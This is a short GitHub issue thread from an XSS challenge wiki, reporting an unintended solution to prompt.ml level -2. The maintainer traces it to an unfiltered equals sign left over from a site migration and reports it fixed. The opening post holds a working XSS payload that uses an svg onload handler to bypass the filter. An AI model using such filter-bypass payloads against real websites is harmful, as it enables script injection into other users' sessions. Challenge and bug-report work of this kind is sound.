### ISSUE TITLE
prompt.ml Level -2

### ISSUE THREAD

**Issue by 837951602** [cure53/XSSChallengeWiki#12]
```"><svg t=#"onload="prompt(1)``` works at least on Firefox

**Comment by 837951602** [comment]
like level 7 solution

**Comment by cure53** [comment]
What's the context here?

**Comment by ohpe** [comment]
True! It also works in webkit .. 
Weird, I don't think it was intended. @filedescriptor? :)

**Comment by tsaniel** [comment]
Sorry when I was migrating the old prompt.ml site I accidentally forgot to filter the equal sign `=`. Fixed now and thanks for the issue!

**Comment by tsaniel** [comment]
Proof if you will.
https://web.archive.org/web/20150209042954/http://prompt.ml/-2

**Comment by ohpe** [comment]
Now makes sense :)

**Comment by filedescriptor** [comment]
^ Well accidentally used my old account to reply, but now you know...
